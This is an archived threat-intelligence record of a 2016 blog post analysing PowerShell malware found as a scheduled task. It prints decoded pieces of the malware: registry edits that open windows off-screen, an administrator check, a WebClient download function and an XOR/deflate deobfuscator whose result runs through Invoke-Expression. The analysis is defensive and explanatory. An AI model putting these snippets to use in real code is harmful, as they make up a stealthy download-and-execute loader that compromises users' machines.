{
	"id": "c2189cf0-4139-49dd-bc98-e404d5d6117b",
	"created_at": "2026-04-06T00:07:31.163477Z",
	"updated_at": "2026-04-10T03:20:51.690942Z",
	"deleted_at": null,
	"sha1_hash": "c03630733147f30d7b3314ac972cbfaeaf2873af",
	"title": "PowerShell Malware",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 129764,
	"plain_text": "PowerShell Malware\r\nBy by cantoris\r\nPublished: 2016-07-22 · Archived: 2026-04-05 17:48:38 UTC\r\n22 Friday Jul 2016\r\nSaw my first example today of an in-the-wild PowerShell Malware on an infested laptop.  It had already been cleaned by\r\nMalwareBytes but I looked it over with Process Explorer and Autoruns and spotted a strange Scheduled Task.\r\nThe task name was the GUID “{080A7D47-0B0F-0B0B-0511-7D0A7F781109}” which I’m pasting here in case it’s\r\nconstant for all infected machines.  The task was set to run at 18:01 and run PowerShell with the usual -ExecutionPolicy\r\nBypass and the -EncodedCommand parameter followed by a long string.\r\nI decoded the string with the following:\r\n1\r\n$decoded =\r\n[System.Text.Encoding] ::UTF8.GetString( [System.Convert] ::FromBase64String( $encoded ))\r\n(Source)\r\nI put the result in the ISE and then reformatted it to make it readable.  The first thing the script did was set all Preference\r\nvariables to SilentlyContinue except for the ErrorAction one which it set to Stop.  Next was a particularly interesting bit of\r\ncode.  I’ve removed two Try-Catch constructs for readability:\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\n9\r\n10\r\n11\r\nfunction sr( $p ) {\r\n$n = \"WindowPosition\"\r\nNew-Item -Path $p | Out-Null\r\ntry {\r\nNew-ItemProperty -Path $p -Name $n -PropertyType DWORD -Value 201329664 |\r\nOut-Null\r\n} catch {\r\nSet-ItemProperty -Path $p -Name $n -Value 201329664 | Out-Null\r\n}\r\n}\r\nsr( \"HKCU:\\Console\\%SystemRoot%_System32_WindowsPowerShell_v1.0_powershell.exe\" )\r\nsr( \"HKCU:\\Console\\%SystemRoot%_System32_svchost.exe\" )\r\nhttps://cantoriscomputing.wordpress.com/2016/07/22/powershell-malware/\r\nPage 1 of 3\n\n12\r\n13\r\nsr( \"HKCU:\\Console\\taskeng.exe\" )\r\nI’d not really looked at that referenced area of the registry before.  If I look at my own HKEY_CURRENT_USER\\Console\r\n, I see the following subkeys which all clearly contain various values to do with console-type window positions, sizes,\r\ncolours etc:\r\nThe piece of code above, is creating keys for the PowerShell Console app, svchost.exe and taskeng.exe and then giving\r\nthem a WindowPosition value of 201329664.  The documentation for that value shows that the high and low order bytes\r\nof it determine the X and Y positions respectively.  In Hex, that value is 0C00 0C00.  0C00 is decimal 3072.  What this\r\nensures is that if PowerShell or the other processes open a Window, it will open off-screen at coordinates 3072×3072!\r\nThe code next exits if PowerShell is less than v2, or if the OS is older than XP SP2, or if the current user is not an\r\nAdministrator.  The latter test uses this neat little one-liner:\r\n1\r\nif ( -not ( [Security.Principal.WindowsPrincipal]\r\n[Security.Principal.WindowsIdentity] ::GetCurrent()).IsInRole( [Security.Principal.WindowsBuiltInRole]\r\n\"Administrator\" )) { break }\r\nNext, there is a long dubious URL in a string which is then passed to the following function to download data from it using\r\nthe System.Net.WebClient class.  Note the User-Agent header being passed:\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\nfunction wc( $url ){\r\n$rq = New-Object System.Net.WebClient\r\n$rq .UseDefaultCredentials= $true\r\n$rq .Headers.Add( \"user-agent\" , \"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1;)\" )\r\nreturn [System.Text.Encoding] ::ASCII.GetString( $rq .DownloadData( $url ))\r\n}\r\nThe returned data is then decoded from Base64, deobfuscated (Xor) and decompressed with the following function:\r\nhttps://cantoriscomputing.wordpress.com/2016/07/22/powershell-malware/\r\nPage 2 of 3\n\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\n9\r\nfunction dstr( $rawdata ){\r\n$bt = [Convert] ::FromBase64String( $rawdata )\r\n$ext = $bt [0]\r\n$key = $bt [1] -bxor 170\r\nfor ( $i =2; $i -lt $bt .Length; $i ++){\r\n$bt [ $i ]=( $bt [ $i ] -bxor (( $key + $i ) -band 255))\r\n}\r\nreturn ( New-Object IO.StreamReader( New-Object IO.Compression.DeflateStream(( New-Object IO.MemoryStream( $bt ,2,( $bt .Length- $ext ))),\r\n[IO.Compression.CompressionMode] ::Decompress))).ReadToEnd()\r\n}\r\nThere’s some rather developery .NET classes in there for me to look up when I’m feeling particularly bored…!\r\nI suspect you can guess how the code ends.  The returned string is passed to Invoke-Expression to be executed to cause\r\nthe next stage of the infection.\r\nSadly, the tale ends here, as the URL given no longer has any live code to download.  😦\r\nSource: https://cantoriscomputing.wordpress.com/2016/07/22/powershell-malware/\r\nhttps://cantoriscomputing.wordpress.com/2016/07/22/powershell-malware/\r\nPage 3 of 3",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://cantoriscomputing.wordpress.com/2016/07/22/powershell-malware/"
	],
	"report_names": [
		"powershell-malware"
	],
	"threat_actors": [],
	"ts_created_at": 1775434051,
	"ts_updated_at": 1775791251,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/c03630733147f30d7b3314ac972cbfaeaf2873af.pdf",
		"text": "https://archive.orkl.eu/c03630733147f30d7b3314ac972cbfaeaf2873af.txt",
		"img": "https://archive.orkl.eu/c03630733147f30d7b3314ac972cbfaeaf2873af.jpg"
	}
}